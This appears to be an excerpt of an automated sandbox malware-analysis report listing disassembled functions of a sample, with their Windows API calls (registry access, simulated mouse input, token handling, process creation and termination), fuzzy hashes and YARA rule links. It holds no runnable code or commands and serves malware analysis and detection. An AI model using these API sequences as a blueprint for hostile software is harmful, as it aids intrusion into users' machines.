RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
RegCloseKey.ADVAPI32(00000000), ref: 00480399

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 55b2a87cd8037f5fb34e7132d60673283e345c063b8d9bd62c294994822b22fe
Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
Opcode Fuzzy Hash: 55b2a87cd8037f5fb34e7132d60673283e345c063b8d9bd62c294994822b22fe
Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56

Function 00485799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 004857FB
GetMenuItemCount.USER32(00000000), ref: 00485832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0048585A
GetMenuItemID.USER32(?,?), ref: 004858C9
GetSubMenu.USER32(?,?), ref: 004858D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00485928

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 230dc1c98bfac88e764d8146ebfd1f08154c5ae3b928d84f1983312ad18440ef
Instruction ID: f019c79df8c938943ad8434395c060b2cb7e18679ec399e957168710705cd923
Opcode Fuzzy Hash: 230dc1c98bfac88e764d8146ebfd1f08154c5ae3b928d84f1983312ad18440ef
Instruction Fuzzy Hash: 72514C75E00615AFCF11EF65C845AAEBBB4EF48314F10446AE801BB352DB78AE418B99

Function 0045EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045EF06
VariantClear.OLEAUT32(00000013), ref: 0045EF78
VariantClear.OLEAUT32(00000000), ref: 0045EFD3
_memmove.LIBCMT ref: 0045EFFD
VariantClear.OLEAUT32(?), ref: 0045F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94

Function 0046220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
IsMenu.USER32(00000000), ref: 004622C3
CreatePopupMenu.USER32 ref: 004622F7
GetMenuItemCount.USER32(000000FF), ref: 00462355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B

Function 00401765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0040179A
GetWindowRect.USER32(?,?), ref: 004017FE
ScreenToClient.USER32(?,?), ref: 0040181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040182C
EndPaint.USER32(?,?), ref: 00401876

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: d9366b8442643d94811bf82364bc44e8890a7fb11cafe672375ae29e37d5b646
Instruction ID: 802354e609c34c5ad38a523f12b28351d49e30531d5e0f2791b792dab913329b
Opcode Fuzzy Hash: d9366b8442643d94811bf82364bc44e8890a7fb11cafe672375ae29e37d5b646
Instruction Fuzzy Hash: AF418E31100700AFD710EF25C884FAA7BE8EB49724F044A3EFA94962F1C734A945DB6A

Function 0048B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(004C57B0,00000000,00C32910,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B712
EnableWindow.USER32(00000000,00000000), ref: 0048B736
ShowWindow.USER32(004C57B0,00000000,00C32910,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B796
ShowWindow.USER32(00000000,00000004,?,0048B5A8,?,?), ref: 0048B7A8
EnableWindow.USER32(00000000,00000001), ref: 0048B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0048B7EF

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
Instruction ID: 1d3b34d551e73e97491640bec01ce8c12bc83bc2c135b759935fb039f22faf4f
Opcode Fuzzy Hash: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
Instruction Fuzzy Hash: 1941A834600340AFDB21DF28C499B9A7BE0FF49310F5845BAF9488F762C735A856CB94

Function 0047709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC

Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3

GetDesktopWindow.USER32 ref: 004770D6
GetWindowRect.USER32(00000000), ref: 004770DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F

Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC

GetCursorPos.USER32(?), ref: 0047713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A

Function 00458879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6

GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
HeapAlloc.KERNEL32(00000000), ref: 004588DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
HeapFree.KERNEL32(00000000), ref: 00458911

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69

Function 004585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
CloseHandle.KERNEL32(00000004), ref: 00458603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64

Function 0045B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0045B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 0045B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045B7CD
ReleaseDC.USER32(00000000,00000000), ref: 0045B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0045B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 0045B7FE

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: e8a4a266755e065bcf82882bab04b7313908cea5161a3f7747e2bdf77f2db466
Instruction ID: ebab011a078b8c66a555392ea924b50fda774449f62ca66a232c327e230173f3
Opcode Fuzzy Hash: e8a4a266755e065bcf82882bab04b7313908cea5161a3f7747e2bdf77f2db466
Instruction Fuzzy Hash: ED018475E00209BBEF109BE69C49A5EBFB8EB48711F00407AFE04A7291D6309C14CF94

Function 00420162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5

Function 004653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9

Function 00467230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00467243
EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E

Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
Instruction ID: 24fb6cd7f7b8029ee4f25158e92bed301f8e8da2948c51d11c28ada49318010c
Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
Instruction Fuzzy Hash: DDF08236540A12EBD7111B64ED4C9DF7739FF45702B1009BAF503A10A0DB7F5819CB59

Function 00458992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
UnloadUserProfile.USERENV(?,?), ref: 004589A9
CloseHandle.KERNEL32(?), ref: 004589B2
CloseHandle.KERNEL32(?), ref: 004589BA
GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
HeapFree.KERNEL32(00000000), ref: 004589CA

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58

Function 00457530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
_memcmp.LIBCMT ref: 00457748

Strings

,,I, xrefs: 0045753D

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

